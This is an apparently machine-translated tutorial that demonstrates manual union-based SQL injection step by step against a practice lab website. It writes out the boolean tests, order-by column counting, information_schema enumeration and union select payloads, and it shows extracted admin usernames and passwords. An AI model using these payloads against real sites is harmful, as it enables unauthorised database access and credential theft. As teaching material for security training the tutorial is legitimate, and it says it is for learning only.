SQL injection vulnerability is one of the most dangerous vulnerabilities at the web level. This article will manually demonstrate the overall process of SQL error injection
Note: Prohibited for actual combat
So let's start with the text, let's first open up our shooting range cattery
http://cntj8003.ia.aqlab.cn/
You can see that there is a "click to view news" in the middle, we click to jump
I found that there is an extra ?id=1 in the URL bar
Let's change ?id=1 to id=2, or id=3, id=4, id=5... Try it
It can be found that each id corresponds to a page
Next, go back to the page with id=1, add and 1=2 after id=1, and build a logic statement to judge whether there is SQL error injection on the website
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2It is found that when and 1=2, the page does not display the content, and then we change and 1=2 to and 1=1, and find that the content of the page is back
This is actually a logical AND operation. You can regard the previous content that can be displayed normally as 1, and as a logical AND operator. 1=2 is not true, so it can be regarded as 0, and the logical AND operation of 1 and 0 is obtained. 0, so the page is not displayed, and 1=1 is established, so it can be regarded as 1, and the logical AND operation of 1 and 1 is 1, so the page has content again
From this, it can be judged that the website has sql error injection
Next, use the order by statement to determine the number of fields
http://cntj8003.ia.aqlab.cn/?id=1 order by 1It can be found that order by 1 and order by 2 can display the page content normally, but order by 3 will not display the content normally
Indicates that the site has two fields
Then use the union select statement to query the echo page
First and 1=2 first displays the error, and then constructs the sql statement
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,2It can be seen that a "2" is echoed in the middle of the page, indicating that there is an error in the position of "2", and it will be echoed to the page
Replace the 2 in the previous step with database()
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,database()It is found that a maoshe is displayed on the page, which is the echoed database name
After having the database name, the next step is to look up the table name and construct a sql statement to pass in
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema= database() limit 0,1table_name from information_schema.tables means tolook up the table name from information_schema , where table_schema= database() meansto constrain where, check the table under the current database, limit 0,1 means to take a piece of data from 0 to 1, and also That is to say, the 0th piece of data is the table name
You can see that the page echoes an admin, and admin is the table name
After getting the table name, check the column name next
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_name= 'admin' limit 0,1Can echo out the first column name
You can see that the first column name is Id, and then we can find out the second column name by changing limit 0,1 to limit 1,1
You can see that the second column name is username, and similarly we can get the third column name password
From the name, we can clearly see that Id is the account number, username is the user name, and password is the password.
Finally, we can directly retrieve the data in the database
http://cntj8003.ia.aqlab.cn/?id=1 and 1=2 union select 1,password from admin limit 0,1password from admin limit 0,1 fetch the first data in password from the admin table
The page echoes hellohack, which is the first data in password, that is, the first password
In the same way, we can take out all the data in the admin table
| Id | username | password |
|---|---|---|
| 1 | admin | hellohack |
| 2 | ppt receive wechat | zkaqbanban |
The above is the process of manual injection
This article is for learning and use, and it is forbidden to do illegal things!